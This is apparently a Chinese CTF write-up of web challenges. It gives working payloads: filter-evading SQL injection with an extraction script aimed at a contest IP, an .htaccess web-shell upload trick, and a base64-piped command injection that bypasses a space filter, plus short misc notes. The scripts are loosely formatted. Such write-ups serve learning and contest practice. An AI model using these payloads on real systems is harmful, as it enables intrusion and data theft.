WEB

sql1

union select联合查询绕过

根据后台语句select * from '$name'

1’ union select 1,’admin’,’md5(123)’ &pw=123

sql2

宽字节 + 报错 + 未知列名

1
search.php?name=admin%df' and (seselectlect 1 from  (seselectlect count(*),concat((selselectect e.2 from (selselectect * from (selselectect 1)a,(selselectect 2)b ununionion selselectect * from f14g)e limit 2 offset 0;),floor(rand(0)*2))x from information_schema.tables group by x)a)%23&pw=3

最后的payload 改数据的条数 然后base64解码一下,写的一个脚本

1
2
3
4
5
6
7
8
9
10
import requests
import re
res=requests.session()
url="http://183.129.189.60:10006/search.php?name=admin\%df' and (seselectlect 1 from (seselectlect count(*),concat((selselectect e.2 from (selselectect * from (selselectect 1)a,(selselectect 2)b ununionion selselectect * from f14g)e limit 1 offset %s),floor(rand(0)*2))x from information_schema.tables group by x)a)%23&pw=3"

for i in range(0,100):
url="http://183.129.189.60:10006/search.php?name=admin%df' and (seselectlect 1 from (seselectlect count(*),concat((selselectect e.2 from (selselectect * from (selselectect 1)a,(selselectect 2)b ununionion selselectect * from f14g)e limit 1 offset "+str(i)+"),floor(rand(0)*2))x from information_schema.tables group by x)a)%23&pw=3"
re1=res.get(url=url)
te=re.findall(r"Error: Duplicate entry '(.*?)1'")
print(re1.text)

有的返回结果里面有个1 而有的没有 所以正则提取这里,没有弄

把结果挨个解码 然后找flag

sql3

没思路

upload

上传一个.htaccess

1
2
3
4
5
<FilesMatch "shell.jpg">
SetHandler application/x-httpd-php
</FilesMatch>

把shell.jpg解析为php

在传一个shell.jpg

需要不断上传,服务端会不停的删,套娃题 先传.htaccesss 后传图片

1
2
3
4
5
6
7
import requests
import re
res=requests.session()
url=''
while True:
re=requests.post(url=url,data={"shell":"var_dump(readfile('/flag'));"})
print(re.text)

不停的访问

ping

命令注入绕过

过滤了空格 单引号 {}

payload

1
echo$IFS$9Y2F0IGZsYWcucGhw|base64$IFS$9-d|sh

套娃题

无参数执行

1
show_source(next(array_reverse(scandir(pos(localeconv())))));

MISC

佛系青年

伪加密 改一下文件头

gakki

foremost分离 爆破压缩包密码 词频分析

不知道咋回事 我的压缩包密码从来就没有爆出来过